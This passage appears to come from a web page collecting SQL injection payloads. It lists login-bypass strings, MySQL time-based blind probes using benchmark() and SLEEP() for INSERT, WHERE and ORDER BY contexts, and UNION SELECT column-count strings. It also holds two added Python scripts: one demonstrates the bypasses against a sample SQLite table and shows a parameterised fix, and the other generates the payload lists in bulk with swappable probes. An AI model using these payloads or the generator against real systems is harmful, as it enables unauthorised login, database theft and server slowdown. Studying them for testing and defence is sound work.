admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
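The auth bypass list above only makes sense against a concrete login query, so here is an added example (not from the original post) that runs some of those entries against a constructed in-memory SQLite database. Two vulnerable login functions are assumed: one that concatenates the username and the hashed password into a single WHERE clause, and one that fetches the row by username and compares the hash in application code; a parameterised version shows the fix. The user table, its passwords and the unsalted MD5 storage are constructed for the demonstration (the `81dc9bdb...` entry in the list depends on MD5 storage, since that value is md5("1234")).

```python
import hashlib
import sqlite3


# Constructed in-memory table standing in for the application's users table.
# Passwords are stored as unsalted MD5 only because the UNION payload from the
# list relies on that; it is not a recommendation.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pwhash TEXT)")
    db.executemany("INSERT INTO users (username, pwhash) VALUES (?, ?)", [
        ("admin", hashlib.md5(b"Sup3r-Secret!").hexdigest()),
        ("alice", hashlib.md5(b"alice1234").hexdigest()),
    ])
    return db


def md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def login_concat(db, username, password):
    """Vulnerable pattern 1: username and password hash are concatenated into
    one WHERE clause. Only the username is injectable, because the password
    is hashed before it reaches SQL."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND pwhash='{md5(password)}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_hash(db, username, password):
    """Vulnerable pattern 2: fetch the row by username, compare the hash in
    application code. A UNION can hand back a row carrying a hash of the
    attacker's choosing, so the comparison succeeds."""
    sql = f"SELECT username, pwhash FROM users WHERE username='{username}'"
    row = db.execute(sql).fetchone()
    if row and row[1] == md5(password):
        return row[0]
    return None


def login_safe(db, username, password):
    """Parameterised query: the same inputs are plain values, never SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND pwhash=?",
        (username, md5(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # admin' --  : the comment removes the password check. SQLite and MySQL
    # both accept --; '#' is MySQL only, so admin' # is a syntax error here.
    print(login_concat(db, "admin' --", "wrong"))           # admin
    # admin' or '1'='1 : AND binds tighter than OR, so this reads
    # username='admin' OR ('1'='1' AND pwhash='...') and the admin row matches.
    print(login_concat(db, "admin' or '1'='1", "wrong"))    # admin
    # ' or '1'='1 with no username gives '' OR (true AND wrong hash): no row.
    # Commenting out the tail turns it into '' OR true, which matches all.
    print(login_concat(db, "' or '1'='1", "wrong"))         # None
    print(login_concat(db, "' or '1'='1'--", "wrong"))      # admin
    # The UNION entry from the list: AND 1=0 drops the real rows and the
    # injected row carries md5("1234"), the password the attacker supplies.
    union = "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"
    print(login_hash(db, union, "1234"))                    # admin
    print(login_safe(db, "admin' --", "wrong"))             # None
```

Two caveats the example encodes: `#` is a MySQL comment and does nothing useful in SQLite, PostgreSQL or MSSQL, and `AND` binds tighter than `OR`, which is why `' or '1'='1` on its own fails against a query with a trailing password check while `' or '1'='1'--` succeeds. That precedence difference is the reason the list carries both the plain and the commented variants of each entry.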

sql bind insert

+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* 
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* 
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* 
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

sql bind where

and 0=benchmark(3000000,MD5(1))%20/*
 and 0=benchmark(3000000,MD5(1))%20--
 and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20/*
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20/*
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20/*
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20/*
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20/*
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20/*
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20/*
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20/*
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20/*
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20/*
'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20%23

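The "sql bind insert" and "sql bind where" lists above are not hand-written: each is the Cartesian product of a prefix (the quote and parentheses needed to get out of the original expression), one probe, and a suffix (the comment that discards the rest of the query), which is the idea sqlmap calls boundaries. This added example (not from the original post) rebuilds both lists from those parts so the same generator can be reused with any probe; the benchmark probe strings are taken from the lists, everything else is assumed.

```python
from itertools import product

# Prefix = how the injected value escapes the original expression: the quote
# that wrapped it (none, ' or ") plus the parentheses that must be balanced.
# Suffix = how the remainder of the original query is thrown away. %20 is
# kept literally because these entries are written for a URL query string.
QUOTES = ("", "'", '"')
PAREN_DEPTHS = (")", "))", ")))", "))))")
SUFFIXES = ("%20/*", "%20--", "%20%23")


def boundaries():
    """Prefixes in the order the 'sql bind where' list uses: quote only,
    then parentheses only, then every quote/parentheses combination."""
    yield from QUOTES
    yield from PAREN_DEPTHS
    for parens in PAREN_DEPTHS:
        for quote in QUOTES[1:]:
            yield quote + parens


def where_payloads(probe="and 0=benchmark(3000000,MD5(1))"):
    """The WHERE-clause list: prefix + probe + suffix for every combination.
    benchmark() returns 0, so '0=benchmark(...)' is always true; the only
    signal is the time the server spends computing 3,000,000 MD5 hashes."""
    return [f"{prefix} {probe}{suffix}"
            for prefix, suffix in product(boundaries(), SUFFIXES)]


def insert_payloads(max_extra_columns=9):
    """The INSERT list: the probe sits inside VALUES(...), so after the timing
    expression it pads the remaining columns with NULL, closes the VALUES list
    with ')' and comments out the rest. One group per guess at the number of
    remaining columns, from 0 up to max_extra_columns."""
    out = []
    for extra in range(max_extra_columns + 1):
        padding = ",NULL" * extra
        for quote, suffix in product(QUOTES, SUFFIXES):
            out.append(f"{quote}+if(benchmark(3000000,MD5(1)),NULL,NULL){padding}){suffix}")
    return out


if __name__ == "__main__":
    print("\n".join(where_payloads()))
    print("\n".join(insert_payloads()))
```

Swapping the probe for a boolean pair such as `and 1=1` / `and 1=2`, or for `and sleep(5)`, gives the corresponding boolean or time-based list for the same set of boundaries, which is how the longer generic lists on this page were produced.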
Other blogs

Generic Union Select Payloads



ORDER BY SLEEP(5)
ORDER BY 1,SLEEP(5)
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 ORDER BY SLEEP(5)#
 ORDER BY 1,SLEEP(5)#
 ORDER BY 1,SLEEP(5),3#
 ORDER BY 1,SLEEP(5),3,4#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
 ORDER BY SLEEP(5)-- 
 ORDER BY 1,SLEEP(5)-- 
 ORDER BY 1,SLEEP(5),3-- 
 ORDER BY 1,SLEEP(5),3,4-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
 UNION ALL SELECT 1
 UNION ALL SELECT 1,2
 UNION ALL SELECT 1,2,3
 UNION ALL SELECT 1,2,3,4
 UNION ALL SELECT 1,2,3,4,5
 UNION ALL SELECT 1,2,3,4,5,6
 UNION ALL SELECT 1,2,3,4,5,6,7
 UNION ALL SELECT 1,2,3,4,5,6,7,8
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
